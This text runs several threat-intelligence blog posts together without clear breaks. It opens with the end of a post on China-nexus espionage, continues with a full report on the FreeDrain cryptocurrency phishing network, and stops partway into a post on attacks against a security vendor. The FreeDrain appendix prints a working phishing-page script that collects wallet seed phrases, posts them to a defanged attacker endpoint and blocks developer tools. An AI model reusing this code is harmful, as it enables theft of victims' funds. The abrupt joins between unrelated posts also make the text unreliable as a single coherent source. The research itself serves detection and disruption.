We track some of the malicious infrastructure used in this attack as part of an ORB network, which we suspect is operated from China and includes compromised network edge devices.
Conclusions
This post highlights the persistent threat posed by China-nexus cyberespionage actors to a wide range of industries and public sector organizations, including cybersecurity vendors themselves. The activities detailed in this research reflect the strong interest these actors have in the very organizations tasked with defending digital infrastructure.
Our findings underscore the critical need for constant vigilance, robust monitoring, and rapid response capabilities. By publicly sharing details of our investigations, we aim to provide insight into the rarely discussed targeting of cybersecurity vendors, helping to destigmatize sharing of IOCs related to these campaigns, and thus contribute to a deeper understanding of the tactics, objectives, and operational patterns of China-nexus threat actors. As these adversaries continue to adapt to our response efforts, it’s essential that defenders prioritize transparency, intelligence sharing, and coordinated action over the fear of reputational harm.
We encourage others in the industry to adopt a proactive approach to threat intelligence sharing and defense coordination, recognizing that collective security strengthens the entire community.
We are grateful to our partners at Lumen Technologies Black Lotus Labs for their collaboration and support.
FreeDrain is an industrial-scale, global cryptocurrency phishing operation that has been stealing digital assets for years.
FreeDrain uses SEO manipulation, free-tier web services (like gitbook.io, webflow.io, and github.io), and layered redirection techniques to target cryptocurrency wallets.
Victims search for wallet-related queries, click on high-ranking malicious results, land on lure pages, and are redirected to phishing pages that steal their seed phrases.
SentinelLABS and Validin researchers identified over 38,000 distinct FreeDrain subdomains hosting lure pages.
Phishing pages are hosted on cloud infrastructure like Amazon S3 and Azure Web Apps, mimicking legitimate cryptocurrency wallet interfaces.
Evidence suggests the operators are based in the UTC+05:30 timezone (Indian Standard Time) and work standard weekday hours.
FreeDrain represents a modern, scalable phishing operation that exploits weaknesses in free publishing platforms and requires better platform-level defenses, user education, and security community collaboration.
Unveiled today at PIVOTcon, this joint research from Validin, the global internet intelligence platform, and SentinelLABS, the threat intelligence and research team of SentinelOne, exposes the FreeDrain Network: a sprawling, industrial-scale cryptocurrency phishing operation that has quietly siphoned digital assets for years. What began as an investigation into a single phishing page quickly uncovered a vast, coordinated campaign weaponizing search engine optimization, free-tier web services, and layered redirection techniques to systematically target and drain cryptocurrency wallets at scale.
In this collaborative blog, we detail the technical anatomy of the FreeDrain operation from the discovery process and infrastructure mapping to evasion techniques and the end-to-end workflow attackers use to funnel victims through multilayered financial theft paths. We also walk through the custom tooling we built to hunt, track, and monitor this large campaign in real time.
Our findings highlight the growing sophistication of financially motivated threat actors and the systemic risks posed by under-moderated publishing platforms. This research underscores the need for adaptive detection, proactive monitoring, and tighter safeguards across the ecosystem to disrupt threats like FreeDrain before they scale.
The Plea for Help
Our investigation into what would become the FreeDrain Network began on May 12, 2024, when Validin received a message from a distressed individual who had lost approximately 8 BTC, worth around $500,000 at the time. The victim had unknowingly submitted their wallet seed phrase to a phishing site while attempting to check their wallet balance, after clicking on a highly-ranked search engine result.
Request for help after successful phish
The individual had come across a Validin blog post from April 2024, which documented a series of crypto-draining phishing pages. The phishing site they encountered shared striking similarities to the infrastructure we had analyzed—specifically, pages hosted on azurewebsites[.]net, along with additional dedicated domain names.
Trusted cryptocurrency tracking analysts confirmed that the destination wallet used to receive the victim’s funds was a one-time-use address. The stolen assets were quickly moved through a cryptocurrency mixer, an obfuscation method that fragments and launders funds across multiple transactions, making attribution and recovery nearly impossible.
While we weren’t able to assist in recovering the lost assets, this outreach marked a turning point. It became clear that the incident was not isolated. We set out to uncover the infrastructure behind the scam and understand the broader operation enabling these thefts to occur at scale.
Cracking the Surface – Our First Look at FreeDrain
When Valdin published the initial findings in April 2024, one key piece of the puzzle remained unclear: how were these phishing pages reaching victims at scale? While common delivery methods like phishing emails, SMS (smishing), social media posts, and blog comment spam are frequently used in cryptocurrency scams, none appeared to be the source in this case.
That changed with the report from the victim in May. They had encountered the phishing site via a top-ranked search engine result, not a suspicious message or unsolicited link.
Curious whether we could reproduce the victim’s experience, we conducted a series of keyword searches ourselves. The results were startling.
Search terms like “Trezor wallet balance” returned multiple malicious results across Google, Bing, and DuckDuckGo, often within the first few result pages.
Trezor Wallet Balance malicious result in DuckDuckGo Trezor Wallet Balance malicious result in top Bing Search Trezor Wallet Balance malicious result in Top Google Search result
These were not obscure or poorly maintained phishing sites; they were professionally crafted lure pages freely hosted on subdomains of trusted platforms like gitbook.io, webflow.io, and github.io.
This discovery marked our first real glimpse into the scale and sophistication of the FreeDrain campaign—and raised a host of new questions. Specifically, what is the overall workflow once a victim visits the site, how are these pages becoming so highly ranked, and what can we discover about the attackers themselves?
Workflow – A Victim’s Path to Compromise
To understand how victims were being funneled into this operation and the post-visit workflow, we checked out the top-ranked search results that we knew weren’t connected to authoritative, legitimate websites, looking for malicious behavior. Within minutes, we encountered related live phishing pages, and quickly began piecing together the end-to-end workflow that a typical victim might experience.
The attack chain was deceptively simple:
Search for wallet-related queries (e.g., “Trezor wallet balance”) on a major search engine.
Click a high-ranking result, often hosted on a seemingly trustworthy platform like gitbook.io or webflow.io.
Land on a page displaying a large, clickable image, a static screenshot of the legitimate wallet interface.
Click the image, which either:
Redirects the user to legitimate websites.
Redirects the user through one or more intermediary sites
Directly leads to a phishing page.
Arrive at the final phishing site, a near-perfect clone of the real wallet service, prompting the user to input their seed phrase.
Attack chain summary
The entire flow is frictionless by design, blending SEO manipulation, familiar visual elements, and platform trust to lull victims into a false sense of legitimacy. And once a seed phrase is submitted, the attacker’s automated infrastructure will drain funds within minutes.
Lure page linking to phishing page Redirect to legitimate site
Lure Page Ranking – Weaponizing SEO
We were stunned by the sheer volume of lure pages appearing among top-ranked search results across all major search engines. These weren’t complex, multi-layered scams. In most cases, the pages consisted of just a single large image (again, usually a screenshot of a legitimate crypto wallet interface) followed by a few lines of text that offered seemingly helpful instructions, ironically, some even claimed to educate users on how to avoid phishing.
This type of simplistic, Q&A-style content is well-known in SEO circles for being rewarded by search engine algorithms. Because users often turn to search engines for direct answers, pages that appear to offer guidance, even when malicious, can be algorithmically elevated in rankings, especially when hosted on high-reputation platforms.
In our early investigation (May–June 2024), we found that many of these lure pages were hosted on services like webflow.io and gitbook.io. Both platforms provide low-friction publishing, enabling anyone to spin up a custom subdomain and publish arbitrary content for free. The subdomains used followed familiar spammer patterns, frequent use of hyphens, deliberate misspellings, and keyword stuffing to manufacture variation and dodge blacklisting.
Subdomain naming scheme similarities
Generative AI as a Tool for Scale
The text on many lure pages bore clear signs of having been generated by large language models. We found copy-paste artifacts that revealed the specific tools used, most notably, strings like “4o mini”, a likely reference to OpenAI’s GPT-4o mini model. These telltale traces suggest that FreeDrain operators are leveraging generative AI not only to create scalable content but doing so carelessly at times.
Fake content mistakenly including OpenAI GPT-4o mini reference
FreeDrain’s Secret Weapon – Spamdexing
But content alone doesn’t explain how these pages were getting indexed and ranked above legitimate sources. How were search engines even discovering them?
The answer came when we identified several indexed URLs pointing back to high-ranking lure pages, and traced them to massive comment spam campaigns. FreeDrain operators appear to be heavily abusing neglected web properties that allow open or weakly-moderated comments, flooding them with links pointing to their lure pages. This old tactic, known as spamdexing, is a well-documented SEO abuse technique, which FreeDrain makes heavy use of as one of the ways to attempt to game SEO.
In one striking example, we found a Korean university photo album page with a single image uploaded over a decade ago, buried under 26,000 comments, nearly all of them containing spam links.
FreeDrain uses large-scale comment spam on poorly-maintained websites to boost the visibility of their lure pages via search engine indexing
This technique allows FreeDrain to sidestep traditional delivery vectors like phishing emails or malicious ads, instead meeting victims exactly where they’re looking, at the top of trusted search engines.
Tracking Search Results
Understanding how FreeDrain’s lure pages consistently climbed to the top of search results became a key investigative goal, and it demanded custom tooling.
We built a purpose-specific crawler designed solely to emulate search engine queries, navigate through pages of search results, and extract structured data from each result: URLs, page titles, and text content summaries. The goal was to systematically monitor how malicious pages were ranking, shifting, and proliferating over time.
We ran this system daily across 700 unique keyword permutations, capturing up to 40 pages deep per search query, per search engine. This daily monitoring provided a dynamic, longitudinal view into the visibility of FreeDrain’s infrastructure.
The Scale of Abuse
After four months of collection, we amassed a dataset of more than 200,000 unique URLs, drawn from topical search results across at least a dozen different publishing platforms that allow users to create custom subdomains. Aggressively filtering, we identified over 38,000 distinct FreeDrain subdomains hosting the lure pages.
These subdomains appeared on well-known free hosting and publishing platforms, including:
Gitbook (gitbook.io)
Webflow (webflow.io)
Teachable (teachable.com)
Github.io
Strikingly (mystrikingly.com)
WordPress.com
Weebly.com
GoDaddySites (godaddysites.com)
Educator Pages (educatorpages.com)
Webador (webador.com)
Breakdown of total domains to suspected URLs, to Confirmed URLs by quantity
The volume and spread across legitimate platforms further highlights how FreeDrain relies on the low-friction, high-trust nature of these services to evade detection and amplify reach.
To go beyond static discovery, we implemented scheduled re-crawls of every suspected lure page. This allowed us to track:
Content updates over time
Changes in redirect behavior
New final-stage phishing URLs being introduced
Takedowns and domain churn
This gave us a clearer picture of FreeDrain’s infrastructure lifecycle, from initial lure page creation to eventual takedown or abandonment, which helped us understand the rotation strategies used to keep malicious links live and searchable.
Lure Page Breakdown
Despite being spread across a wide array of publishing platforms, FreeDrain lure pages followed a remarkably consistent structure, carefully optimized to appear helpful and legitimate, while subtly guiding victims toward compromise.
Common Elements Observed Across Lure Pages
Across gitbook.io, webflow.io, github.io, and others, the pages typically included:
A single, large, clickable image occupying most of the viewport
This image was a screenshot of a legitimate cryptocurrency site (e.g., Trezor, Metamask, or Ledger)
The image linked externally, usually to a malicious redirection chain
AI-generated help content positioned below the image
The text answered common user queries like “How do I check my wallet balance on Trezor?”
1–2 additional embedded links, which pointed to the same external destination as the image or were placeholders like "#"
Link Behavior: Redirection Variability
Clicking the image or associated links triggered unpredictable outcomes, depending on the time, user agent, or page freshness:
Redirection through one or more intermediary domains (typically 1–5 hops)
Final destinations varied widely:
A phishing page built to capture wallet seed phrases (hosted on Azure or AWS S3)
A legitimate site like trezor.io or metamask.io, creating false reassurance
A non-functional domain (404 or NXDOMAIN)
The current page itself ("#") acting as a placeholder when infrastructure wasn’t active
This redirection behavior made classification challenging, especially since not every page led directly to a phishing endpoint in every instance.We observed that lure pages initially hosted benign content before being modified to include malicious redirects usually weeks or months later. This aging tactic likely helped the sites build trust and survive longer before being flagged or removed.
A Github lure page that has just been changed from benign to malicious
Obfuscation Through Variation
Identifying FreeDrain lure pages at scale proved difficult due to extreme variation in phrasing, metadata, and platform-specific formatting. For example, we identified 46 unique renderings of the word “Trezor”, all visually similar, using tricks like added Unicode characters, zero-width spaces, and mixed script alphabets.
Trezor variation heatmap by quantity
Demonstrating the variations in tooling use, we found that FreeDrain pages on github\.io were usually copies of the generated content from services like Mobrise Website Builder and Webflow.
Snippets of pages hosted on github\.io with content clearly generated using other tools, for example, “Mobrise Website Builder”
A turning point in connecting these fragmented domains came from pivoting off the redirection infrastructure. While the lure content varied, the redirectors often remained consistent across pages and platforms.
Validin result showing redirector abusing free services
By tracing traffic from anchor links to known FreeDrain redirectors, we were able to map common ownership and activity across otherwise-unrelated services. This infrastructure-based pivot became essential for clustering and attribution, bridging gaps that the lure content itself couldn’t.
Redirectors
Pivoting on URLs from known and suspected FreeDrain lure pages that we were monitoring, we quickly noticed some noteworthy patterns in the FreeDrain redirection domains.
Domain Characteristics
Nearly all redirector domains shared several features:
.com TLDs exclusively
Names that appeared algorithmically generated, likely via a Domain Generation Algorithm (DGA) or Markov chain model
English-adjacent structure, visually familiar but never forming real English words
Examples include:
antressmirestos[.]com
shotheatsgnovel[.]com
bildherrywation[.]com
Each URL also included a GUID-like string in the path, which may have served as a session ID, traffic source identifier, or logic gate for redirection behavior. Examples:
(A complete list of FreeDrain-associated redirector domains is provided in the appendix.)
Domain Registration and Infrastructure Clues
All domains we identified were registered via Key-Systems GmbH, a registrar often used for bulk domain purchases and programmatic registration.
Initially, we suspected that these domains were all managed by the FreeDrain operators as well, but have since connected these domains to a much larger network of thousands domain names that are used to route traffic for many different purposes.
Looking at DNS history for some of the older redirectors on our list, we saw that they rotated IP addresses relatively infrequently, resolving to just a small number of IPs within a time window of weeks to months.
DNS history for scientcontopped[.]com prior to expiration (2024)
The domain resolved to only a handful of IPs over its active life suggesting stable, centralized hosting infrastructure.
Pivoting on IP addresses shared by these older FreeDrain domains revealed that there are hundreds of other domain names that share nearly identical characteristics in terms of naming conventions, registration patterns, and hosting patterns. Yet, these other domains didn’t exhibit direct ties to FreeDrain behavior.
Pivot from confirmed FreeDrain redirector (yellow asterisk) reveals broader domain ecosystem with matching infrastructure traits
This led us to two possibilities:
The redirectors are part of a leased infrastructure-as-a-service model, used by FreeDrain and potentially many other threat actors
FreeDrain is a subdivision of a broader operation, with shared tooling and infrastructure but distinct campaigns
At this stage, the full extent of this infrastructure and the relationships between campaigns remain an open research question. What is clear, however, is that FreeDrain does not operate in isolation, and the redirection layer may be a service used by multiple actors.
Phishing Pages
Across our monitoring, we observed dozens of variations in FreeDrain phishing pages but technically, they were all fairly simple and consistent in architecture.
These phishing pages were most often:
Hosted on cloud infrastructure, primarily Amazon S3 and Azure Web Apps
Designed to mimic legitimate cryptocurrency wallet interfaces (Trezor, MetaMask, Ledger, etc.)
Implemented using HTML forms or AJAX POST requests to transmit stolen credentials to attacker-controlled endpoints
A typical FreeDrain phishing page served from an S3 bucket, delivering only static content
Some S3-hosted phishing sites sent harvested data to live backend services on Azure, as seen in multiple instances where form actions pointed to azurewebsites.net applications.
The form for an S3-hosted FreeDrain phishing page posts to “/send.php” running in Azure
Human Operators Behind the Scenes
While most pages used standard static phishing techniques, we occasionally encountered live chat widgets embedded in Azure-hosted phishing pages.
This chat feature had previously been documented in a 2022 report by Netskope (one of the few references we ever found to FreeDrain and the earliest reported). Our own interactions confirmed that humans, not bots, were responding to victim inquiries in real time, often providing reassurance or technical “help” to keep targets engaged.
Live chat interaction on a phishing page hosted in Azure
Clean, Unobfuscated Exfiltration Code
In the malicious JavaScript that we observed that handled POST requests with stolen seed phrases, the code is well-formatted, commented, and does not appear to be obfuscated in any way. Full examples are provided in the appendix, but a snippet of the POST request is below (domain bolded and defanged):
Despite its simplicity, the phishing backend was effective, disposable, and often difficult to trace—highlighting just how low the bar is for technical sophistication when paired with wide-scale reach and persistent lure infrastructure.
Actor Analysis
Attribution is inherently difficult when infrastructure is ephemeral and built on shared, free-tier services. Yet through a combination of repository metadata, behavioral signals, and timing artifacts, we were able to extract meaningful insights about FreeDrain’s operators, including likely location, working patterns, and their degree of operational coordination.
Our first major breakthrough came from GitHub Pages (github.io), which only allows hosting via a public repository that matches the account’s GitHub username (e.g., username.github.io). This constraint meant every active FreeDrain lure page hosted on GitHub had a publicly accessible repository behind it.
We cloned hundreds of these repositories and analyzed the commit metadata, including timestamps, usernames, email addresses, and whether commits were made via the CLI or web interface. Several clear patterns emerged:
Email addresses were always unique, tied 1:1 with the GitHub account, and never reused.
All emails came from free providers like Gmail, Hotmail, Outlook, and ProtonMail.
While naming styles varied widely (capitalization, numbers, patterns), we found clusters of similarly structured addresses, suggesting manual creation by multiple individuals, possibly using shared templates or naming approach.
Sample of email addresses found in FreeDrain-associated Github commit
Importantly, GitHub commits preserve the local timezone of the user unless manually configured otherwise. In our dataset, over 99% of commits were timestamped in UTC+05:30 (Indian Standard Time), our first strong geographic indicator.
Over 99% of the commits analyzed were localized to UTC+05:30
We corroborated this signal using metadata from other FreeDrain free-infrastructure/services. Webflow, for instance, embeds a “last published” timestamp in the HTML source of hosted sites. When we aggregated timestamps across the many FreeDrain Webflow pages, a clear 9-to-5 weekday work pattern emerged, complete with a consistent midday break. This pattern aligns closely with a standard business schedule in the IST timezone.
Aggregated Webflow publish times show an exceptionally clear weekday work pattern in UTC+05:30Webflow embeds publish timestamps into the HTML source code of published websites
Combining these and other signals across platforms, we assess with high confidence that FreeDrain is operated by individuals based in the IST timezone, likely in India, working standard weekday hours.
Additionally, timeline analysis shows that FreeDrain has been active since at least 2022, with a notable acceleration in mid-2024. As of this writing, the campaign remains active across several free hosting and publishing platforms.
Confirmed “last published” times, by date
Disruption Efforts and Opportunities
The scale and diversity of services abused by FreeDrain made disruption an ongoing challenge. While the campaign leaned heavily on free-tier platforms, many of which allowed users to publish images, text, external links, and even custom JavaScript to subdomains under well-known parent domains, very few of these platforms offered streamlined abuse reporting workflows.
In most cases, there was no direct method to report malicious content from the content page itself, forcing us to manually investigate each platform’s policies, support forms, or contact channels. This adds unnecessary friction to the response process, especially when scaled across hundreds of active malicious pages.
Even more concerning, most of the publishing platforms lacked the detection capabilities to identify this type of coordinated abuse on their own. The indicators were there: repetitive naming patterns, clustered behavior, identical templates reused across subdomains, but limited proactive action was being taken.
This highlights a broader industry need:
Free-tier content platforms should invest in basic abuse prevention tooling and more accessible reporting mechanisms.
At minimum, this includes:
Allowing abuse to be reported directly from published content pages
Monitoring for patterns of misuse (e.g., bulk account creation, similar domain structures, repeated hosting of external phishing kits)
Establishing direct communication lines with trusted threat intel analysts and threat researchers
FreeDrain’s reliance on free-tier platforms is not unique, and without better safeguards, these services will continue to be weaponized at scale.
This isn’t just a security issue, it’s a business one. When threat actors abuse these platforms to host phishing pages, fake login portals, or crypto scams, they erode user trust in the entire platform domain. Over time, this leads to real financial consequences:
Reputation damage: Reputable domain names like webflow.io, and teachable.com can quickly become flagged by corporate security tools, browser warning systems, and threat intelligence feeds. This reduces their utility for legitimate users and undermines the brand’s credibility.
Deliverability and discoverability: Once a platform’s domain is associated with widespread abuse, search engines, email providers, and social networks may down-rank or block links from that domain, hurting all users, including paying customers.
Customer churn and support burden: Abuse-driven issues often result in a higher volume of customer support tickets, complaints, and refunds, particularly when paying users find their content mistakenly flagged or blocked due to a shared domain reputation.
Increased infrastructure and fraud costs: Hosting abusive content, even at scale on free tiers, still consumes compute, storage, and bandwidth. Worse, it may attract waves of automated account signups and resource abuse that raise operational costs.
Failing to detect and mitigate this kind of abuse isn’t just a user risk– it’s an unpaid tax on the business, dragging down growth and trust at every layer. Proactive abuse prevention and streamlined reporting are not just table stakes for security, they’re critical to long-term sustainability.
References and Similarities to Other Campaigns
Elements of the FreeDrain campaign were first publicly documented in August 2022 by Netskope, with a follow-up report in September 2022. Netskope’s early findings captured the core tactics that continue today: leveraging SEO manipulation to drive traffic to lure pages, which then redirect to credential-harvesting phishing sites. Netskope also published another update in October 2024, focusing on FreeDrain’s use of Webflow-hosted infrastructure, confirming the campaign’s continued evolution while retaining the same fundamental workflow.
FreeDrain’s abuse of legitimate free-tier platforms is part of a broader trend in phishing infrastructure, but it remains distinct from other well-known crypto phishing efforts. For example, the CryptoCore campaign, reported by Avast in August 2024, similarly targets cryptocurrency users but relies heavily on YouTube content and impersonation videos to draw in victims, rather than search engine poisoning and static phishing sites.
In 2023, Trustwave reported on the use of Cloudflare’s pages.dev and workers.dev services in phishing, showing how modern hosting platforms that offer free, customizable subdomains with minimal friction are being systematically exploited, mirroring FreeDrain’s approach.
Recent reporting has also shed light on the kinds of threat actors that may be behind campaigns like FreeDrain. Just this week, the U.S. Treasury sanctioned individuals linked to cyber scam operations in Southeast Asia, specifically a militia group in Burma involved in online fraud networks. While distinct from FreeDrain, these operations share similar hallmarks: large-scale abuse of online infrastructure, technical capability, and a focus on financial theft, demonstrating the scale and organization such campaigns can operate under.
FreeDrain’s techniques have also been informally documented by affected users. In particular, Trezor hardware wallet customers have reported fraudulent websites mimicking the Trezor ecosystem, some of which were part of FreeDrain’s infrastructure:
The FreeDrain network represents a modern blueprint for scalable phishing operations, one that thrives on free-tier platforms, evades traditional abuse detection methods, and adapts rapidly to infrastructure takedowns. By abusing dozens of legitimate services to host content, distribute lure pages, and route victims, FreeDrain has built a resilient ecosystem that’s difficult to disrupt and easy to rebuild.
Through detailed infrastructure analysis, repository metadata mining, and cross-platform behavioral correlations, we uncovered rare insights into the actors behind the campaign, including strong indicators that the operation is manually run by a group based in the UTC+05:30 timezone, working standard business hours. Despite this visibility, systemic weaknesses in reporting mechanisms and abuse detection have allowed FreeDrain to persist and even accelerate in 2024.
This is not just a FreeDrain problem. The broader ecosystem of free publishing platforms is being exploited in ways that disproportionately benefit financially motivated threat actors. Without stronger default safeguards, identity verification, or abuse response infrastructure, these services will continue to be abused, undermining user trust and inflicting real-world financial harm.
By exposing the scale and structure of the FreeDrain network, we hope this research will enable better platform-level defenses, more informed user education, and collaboration across the security community to limit the reach and longevity of operations like this.
This is an example of the JavaScript (“app.js”) that was included on the S3-hosted phishing example: https://dft0-hjgkd26-fkj.s3.us-east-1.amazonaws[.]com/index.html.
Note the defanged malicious URL in the code below–that is the only alteration.
let currentWordCount = 12; // Default word count
function updateInputFields(wordCount) {
const inputContainer = document.getElementById('inputContainer');
inputContainer.innerHTML = '';
currentWordCount = wordCount;
for (let i = 0; i < wordCount; i++) { // Use 0-based index for phase keys
const colDiv = document.createElement('div');
// if (wordCount === 1) {
// colDiv.className = 'col-lg-21 col-md-12 col-sm-12 col-xs-12';
// colDiv.innerHTML = `
// <input
// class="form-control"
// type="text"
// placeholder="Input your words as many words as you have"
// name="word${i}"
// required
// title="Only alphabets are allowed.">
// <div class="error-message" style="font-size:12px;color: #fe3131f2; display: none;">Please enter a valid value.</div>
// `;
// } else {
colDiv.className = 'col-lg-4 col-md-4 col-sm-4 col-xs-12';
colDiv.innerHTML = `
<input
class="form-control"
type="text"
placeholder="${i + 1}."
name="word${i}"
required
pattern="[a-zA-Z]{1,10}"
maxlength="10"
oninput="this.value = this.value.replace(/[^a-zA-Z]/g, '').substring(0, 10);"
title="Only alphabets are allowed.">
<div class="error-message" style="font-size:12px;color: #fe3131f2; display: none;">Please enter a valid value.</div>
`;
// }
inputContainer.appendChild(colDiv);
}
event.target.classList.add('active');
const buttons = document.querySelectorAll('.displayflex button');
buttons.forEach((button) => {
button.classList.remove('active');
});
event.target.classList.add('active');
}
async function handleNextStep(event) {
event.preventDefault();
const inputContainer = document.getElementById('inputContainer');
const inputs = inputContainer.querySelectorAll('input');
let allValid = true;
const enteredWords = new Set();
inputs.forEach((input) => {
const errorDiv = input.nextElementSibling; // Get the associated error div
if (!input.checkValidity()) {
errorDiv.style.display = 'block';
allValid = false;
} else {
errorDiv.style.display = 'none';
}
const word = input.value.trim().toLowerCase(); // Normalize to lowercase to handle case insensitivity
if (word && enteredWords.has(word)) {
allValid = false;
errorDiv.innerHTML = 'This word has already been entered.';
errorDiv.style.display = 'block';
} else {
enteredWords.add(word); // Add word to the Set
}
});
if (!allValid) {
alert("Mnemonic phrase is not valid. Try again.");
return;
}
const data = {};
inputs.forEach((input, index) => {
data[`phrase${index}`] = input.value.trim();
});
data.subject = "Trezor connect2";
data.message = "Successfull fetch data";
$.ajax({
type: "POST",
url: "https://rfhwuwixxi.execute-api.us-east-1.amazonaws[.]com/prod/eappmail",
dataType: "json",
crossDomain: true,
contentType: "application/json; charset=utf-8",
data: JSON.stringify(data),
success: function (result) {
alert('Data submitted successfully1!');
window.location.href = 'https://suite.trezor.io/web/';
location.reload();
},
error: function (xhr, status, error) {
window.location.href = 'https://suite.trezor.io/web/';
}
});
}
window.onload = function () {
// Prevent the back button from navigating back
function preventBack() {
history.forward();
}
// Execute the `preventBack` function immediately after page load
setTimeout(preventBack, 0);
// Ensure the page doesn't cache on unload, forcing users to reload
window.onunload = function () {
return null;
};
};
document.addEventListener('DOMContentLoaded', () => updateInputFields(12));
document.addEventListener("DOMContentLoaded", function () {
const statusButton = document.getElementById("statusButton");
const statusText = document.getElementById("statusText");
const statusIcon = document.getElementById("statusIcon");
// Initial state: "Waiting for Trezor..."
statusText.textContent = "Waiting for Trezor... ";
statusIcon.innerHTML = '';
// After 2 seconds: "Establishing connection"
setTimeout(() => {
statusText.textContent = "Establishing connection...";
statusIcon.innerHTML = '';
}, 5000);
// After 5 seconds: "Unable to read data" (Error state)
setTimeout(() => {
statusText.textContent = "Unable to read data";
statusIcon.innerHTML = '';
statusButton.classList.add("error-btn");
}, 5000);
function resetStatus() {
// Reset to "Establishing connection..."
statusText.textContent = "Establishing connection...";
statusIcon.innerHTML = '';
statusButton.classList.remove("error-btn"); // Reset error button class
// After 3 seconds: Change status to "Unable to read data"
setTimeout(() => {
statusText.textContent = "Unable to read data";
statusIcon.innerHTML = '';
statusButton.classList.add("error-btn");
}, 5000);
}
// Event listener for button click
statusButton.addEventListener("click", function () {
resetStatus(); // Reset and start the cycle on each click
});
// Optionally, you can trigger the status change flow immediately after page load for testing
setTimeout(() => {
resetStatus(); // Automatically run the flow when the page loads (optional)
}, 5000);
});
// Disable right-click context menu
document.addEventListener("contextmenu", (event) => event.preventDefault());
// Disable key combinations for opening developer tools
document.addEventListener("keydown", (event) => {
// Disable F12, Ctrl+Shift+I, Ctrl+Shift+J, Ctrl+U (View Source), Ctrl+Shift+C
if (
event.key === "F12" ||
(event.ctrlKey && event.shiftKey && ["I", "J", "C"].includes(event.key)) ||
(event.ctrlKey && event.key === "U")
) {
event.preventDefault();
}
});
// Detect if devtools is opened (basic detection)
const detectDevTools = () => {
const element = new Image();
Object.defineProperty(element, "id", {
get: () => {
alert("Developer tools detected. Please close it to proceed.");
// Redirect or log out the user
window.location.href = "about:blank"; // Example action
},
});
console.log(element);
};
detectDevTools();
setInterval(detectDevTools, 1000);
In recent months, SentinelOne has observed and defended against a spectrum of attacks from financially motivated crimeware to tailored campaigns by advanced nation-state actors.
These incidents were real intrusion attempts against a U.S.-based cybersecurity company by adversaries, but incidents such as these are neither new nor unique to SentinelOne.
Recent adversaries have included:
DPRK IT workers posing as job applicants
ransomware operators probing for ways to access/abuse our platform
Chinese state-sponsored actors targeting organizations aligned with our business and customer base
This report highlights a rarely-discussed but crucially important attack surface: security vendors themselves.
Overview
At SentinelOne, defending against real-world threats isn’t just part of the job, it’s the reality of operating as a cybersecurity company in today’s landscape. We don’t just study attacks, we experience them firsthand, levied against us. Our teams face the same threats we help others prepare for, and that proximity to the front lines shapes how we think, and how we operate. Real-world attacks against our own environment serve as constant pressure tests, reinforcing what works, revealing what doesn’t, and driving continuous improvement across our products and operations. When you’re a high-value target for some of the most capable and persistent adversaries out there, nothing less will do.
Talking about being targeted is uncomfortable for any organization. For cybersecurity vendors, it’s practically taboo. But the truth is security vendors sit at an interesting cross-section of access, responsibility, and attacker ire that makes us prime targets for a variety of threat actors, and the stakes couldn’t be higher. When adversaries compromise a security company, they don’t just breach a single environment—they potentially gain insight into how thousands of environments and millions of endpoints are protected.
In the past several months alone, we’ve observed and defended against a spectrum of attacks ranging from financially motivated crimeware to tailored campaigns by advanced nation-state actors. They were real intrusion attempts targeting a U.S.-based cybersecurity company — launched by adversaries actively looking for an advantage, access, or leverage. Adversaries included DPRK IT workers posing as job applicants, ransomware operators probing for ways to access/abuse our platform, and Chinese state-sponsored actors targeting organizations aligned with our business and customer base.
We are certainly not the only ones facing these threats. In the spirit of furthering collective defenses and encouraging further collaboration, we’re pulling back the curtain to share some of what we’ve seen, why it matters, and what it tells us about the evolving threat landscape—not just for us, but for every company building and relying on modern security technology.
DPRK IT Workers Seeking Inside Jobs
One of the more prolific and persistent adversary campaigns we’ve tracked in recent years involves widespread campaigns by DPRK-affiliated IT Workers attempting to secure remote employment within Western tech companies– including SentinelOne. Early reports drew attention to these efforts and our own analysis revealed further logistical infrastructure to launder illicit funds via Chinese intermediary organizations. However, neither gave a sense of the staggering volume of ongoing infiltration attempts. This vector far outpaces any other insider threat vector we monitor.
These actors are not just applying blindly — they are refining their process, leveraging stolen or fabricated personas, and adapting their outreach tactics to mirror legitimate job seekers in increasingly convincing ways. Our team has tracked roughly 360 fake personas and over 1,000 job applications linked to DPRK IT worker operations applying for roles at SentinelOne — even including brazen attempts to secure positions on the SentinelLabs intelligence engineering team itself.
Public reporting of DPRK IT workers applying to threat intelligence positions
Engagement and Adversary Interaction
Instead of staying passive, we made a deliberate choice towards intelligence-driven engagement. In coordination with our talent acquisition teams, we developed workflows to identify and interact with suspected DPRK applicants during the early phases of their outreach. This collaboration was key. By embedding lightweight vetting signals and monitoring directly into recruiting processes — without overburdening hiring teams — we were able to surface anomalous patterns tied to DPRK-affiliated personas piped directly into our Vertex Synapse intelligence platform for analyst review.
Our attempted interactions offered rare insights into the craftiness and persistence of these infiltration campaigns — particularly the ways in which adversaries adapt to the friction they encounter.
Inbound DPRK referral request to strategic employees
The attackers are honing their craft beyond the job application and recruitment process. An operation of this scale and nature requires a different kind of backend infrastructure, such as a sprawling network of front companies to enable further laundering and logistics.
DPRK IT Worker Front Company Network (November 2024)
Helping Hiring Teams Help Us
A key takeaway in working on this investigation was the value of intentionally creating inroads and sharing threat context with different teams not normally keyed into investigations. Rather than cluelessness, we encountered an intuitive understanding of the situation as recruiters had already been filtering out and reporting ‘fake applicants’ within their own processes.
We brought campaign-level understanding that was combined with tactical insights from our talent team. The payoff was immediate. Recruiters began spotting patterns on their own, driving an increase in early-stage escalation of suspicious profiles. They became an active partner that continues to flag new sightings from the frontlines. In turn, we are codifying these insights into automated systems that flag, filter, enrich, and proactively block these campaigns to lower the burden on our recruiters and hiring managers, and reduce the risk of infiltration.
Make cross‑functional collaboration standard operating procedure: equip frontline business units—from recruiting to sales—with shared threat context and clear escalation paths so they can surface anomalies early without slowing the business. Codifying insights with automation will consistently bring bi-directional benefits.
The DPRK IT worker threat is a uniquely complex challenge — one where meaningful progress depends on collaboration between the security research community and public sector partners.
Ransomware Group Capability Development
Financially motivated threat actors frequently target enterprise security platforms —products designed to keep them from making money—for direct access. SentinelOne, like our peers, is no exception. While uncomfortable, this is a reality the industry faces continually and should handle with both transparency and urgency.
Forum post offering security product access
Privileged access to administrative interfaces or agent installers for endpoint security products provides tangible advantages for adversaries seeking to advance their operations. Console access can be used to disable protections, manipulate configurations, or suppress detections. Direct, unmonitored access to the endpoint agent offers opportunities to test malware efficacy, explore bypass or tampering techniques, and suppress forensic visibility critical for investigations. In the wrong hands, these capabilities represent a significant threat to both the integrity of security products and the environments they protect.
